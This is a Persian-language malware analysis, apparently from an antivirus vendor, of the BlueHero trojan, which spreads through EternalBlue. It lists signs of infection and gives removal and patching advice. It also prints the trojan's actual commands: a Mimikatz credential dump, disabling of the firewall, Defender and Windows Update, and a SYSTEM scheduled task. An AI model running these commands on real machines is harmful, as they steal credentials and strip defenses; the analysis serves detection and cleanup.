Trojan.Win32.BlueHero

شرح کلی

نوع: تروجان (Trojan)
اسامی بدافزار:
Trojan.Win32.BlueHero.a
درجه تخریب: زیاد
میزان شیوع: متوسط
آسیب‌پذیری مورد استفاده:  EternalBlue

تروجان (Trojan) چیست؟

تروجان‌ها نوعی از بدافزار محسوب می‌شوند که خود را در قالب یک نرم‌افزار سالم و قانونی نشان می‌دهند و بسیار شبیه نرم‌افزارهای مفید و کاربردی رفتار می‌کنند، اما هنگامی‌که اجرا می‌شوند خرابی‌های زیادی را برای سیستم ایجاد می‌کنند. نرم‌افزارهای دانلود شده از اینترنت، جاسازی شدن در متن HTML، ضمیمه شدن به یک ایمیل و غیره از جمله راه‌های ورود تروجان‌ها می‌باشند. تروجان‌ها برخلاف ویروس‌ها و کرم‌های کامپیوتری قادر به تکثیر خود نیستند.

بدافزار BlueHero چیست؟

این بدافزار برای انتشار خود از آسیب‌پذیری‌ مبتنی بر EternalBlue استفاده می‌کند. هدف نهایی این بدافزار استخراج ارز دیجیتال و جاسوسی از سیستم کاربر است. بدافزار از طریق استفاده از پردازنده سیستم قربانی، استخراج ارز دیجیتالی را انجام می­‌دهد.

توضیحات فنی

علائم آلودگی به بدافزار BlueHero :

  • وجود فایل اصلی بدافزار با نام­‌های تصادفی در مسیرهای زیر:

%Windir%\ [Random]

%Windir%\Fonts

  • وجود فایل‌­  Miner بدافزار با نام  Random].exe] در مسیر زیر:

%Windir%\Temp\ [Random]

  • وجود یک نمونه بدافزار Siscos با نام تصادفی در یکی از مسیرهای زیر:

%Windir%\syswow64

%Windir%\system32

  • وجود بقا برای فایل موجود در مسیر %Windir%\Fonts در مسیر رجیستری زیر:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

  • وجود یک ScheduledTask برای فایل موجود در مسیر %Windir%\Fonts با نام تصادفی.
  • ایجاد دو Service با نام­‌های تصادفی که یکی از آن­‌ها برای بدافزار Siscos و دیگری برای فایل موجود در مسیر %Windir%\ [Random] است.
  • در حالت آلودگی تمام فایل‌­های ذکر شده در حال اجرا هستند و قابل ذکر است که پردازه Miner بدافزار، زیرمجموعه پردازه Spoolsv.exe (یک پردازه سیستمی است) اجرا می­‌شود.

شرح عملکرد

با اجرای فایل اصلی، بدافزار شروع به ایجاد و اجرای فایل­‌های ذکرشده می‌­کند. و پس از آن Command هایی را روی سیستم قربانی اجرا می‌­کند. این Command ها به شرح زیر است:

  • حذف تمام سیاست‌های ارتباطی سیستم با استفاده از دستور زیر:

netsh ipsec static delete all

  • افزودن سیاست‌ ارتباطی (ipsec) موردنظر خود با استفاده از دستور زیر:

netsh ipsec static add policy name=[Malware’s ipsec] description=[ Malware’s ipsec]

  • ایجاد ScheduledTask برای یکی از نسخه­‌های خود در پوشه Fonts، با استفاده از دستور زیر:

cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn “astbpvetc” /ru system /tr “cmd /c %Windir%\Fonts\abapbsi.exe”

  • این بدافزار همچنین از برنامه Mimikatz برای به دست آوردن اطلاعات Userهای سیستم استفاده می­‌کند. این برنامه در مسیر %Windir%\[Random]\Corporate با نام exe ساخته می­‌شود که با استفاده از دستور زیر اجرا شده و خروجی آن در فایل log.txt قرار می­‌گیرد.

cmd /c %Windir%\[Random]\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> %Windir%\[Random]\Corporate\log.txt

  • غیرفعال کردن Firewall برای یوزرهای Domain، Private و Public :

cmd /c netsh firewall set opmode mode=disable

cmd /c netsh Advfirewall set allprofiles state off

  • غیرفعال کردن سرویس Internet Connection Sharing (ICS) و غیرفعال کردن start دوباره آن:

cmd /c net stop SharedAccess

cmd /c sc config SharedAccess start= disabled

  • غیرفعال کردن سرویس Firewall و غیرفعال کردن start دوباره آن:

cmd /c net stop MpsSvc

cmd /c sc config MpsSvc start= disabled

  • غیرفعال کردن سرویس WindowsDefender و غیرفعال کردن start دوباره آن:

cmd /c net stop WinDefend

cmd /c sc config WinDefend start= disabled

  • غیرفعال کردن سرویس Update ویندوز و غیرفعال کردن start دوباره آن:

cmd /c net stop wuauserv

cmd /c sc config wuauserv start= disabled

  • گرفتن Dump از تمام پردازه­‌های سیستم و ذخیره آنها در قالب فایلی با نام ProcessId].dmp] با استفاده از دستور زیر:

%Windir%\TEMP\[Random] \stellulag.exe -accepteula -mp 1536 %Windir%\TEMP\[Random] \1536.dmp

  • منع دسترسی تمام User ها به فایل hosts . با استفاده از دستور زیر:

cmd /c echo Y|cacls %Windir%\system32\drivers\etc\hosts /T /D users & echo Y|cacls %Windir%\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls %Windir%\system32\drivers\etc\hosts /T /D SYSTEM

 

فایل اصلی بدافزار همچنین سبب ایجاد تغییرات زیر در سیستم می­‌شود:

  • تغییر داده پیش­فرض مقدار (Default) برای برخی از پسوندها به txtfile در مسیر رجیستری HKEY_CLASSES_ROOT که سبب در نظر گرفته شدن این نوع فایل­‌ها به عنوان فایل text و اختلال در عملکرد آن­‌ها می­‌شود. این انواع شامل موارد زیر است:

    .bat , .cmd , .js , .vbs , .VBE , .reg , .ps1

  • ایجاد یک فیلتر در بین سیاست‌های ارتباطی سیستم. این فیلتر در مسیر رجیستری زیر قابل مشاهده است:

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local

  • تعریف مقدار Debugger در رجیستری برای یک سری از برنامه­‌های سیستمی که باعث می­‌شود کاربر نتواند از آن­ها استفاده کند. این مقدار در مسیر رجیستری زیر تعریف می­‌شود:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

برنامه های سیستمی که با اینکار باعث مختل شدن عملکردشان میشود به لیست زیر است:

at.exe

bitsadmin.exe

cacls.exe

certutil.exe

cscript.exe

icacls.exe

magnify.exe

mshta.exe

netsh.exe

perfmon.exe

powershell.exe

reg.exe

regini.exe

Regsvr32.exe

rundll32.exe

schtasks.exe

sethc.exe

takeown.exe

taskkill.exe

WinSAT.exe

WmiPrvSE.exe

wscript.exe

روش مقابله و پاک‌سازی سیستم

آنتی ویروس پادویش این بدافزار را شناسایی کرده و از سیستم حذف می‌کند. جهت پیشگیری از آلودگی های احتمالی توسط بدافزارهایی که از آسیب‌پذیری EternalBlue استفاده می‌کنند، پیشنهاد می‌شود از وصله امنیتی ارائه شده توسط مایکروسافت ms17-010 استفاده کنید. بخش جلوگیری از نفوذ (IPS) آنتی ویروس پادویش این گونه آسیب‌پذیری‌ها را شناسایی کرده و از ورود آن به سیستم قربانی جلوگیری می کند .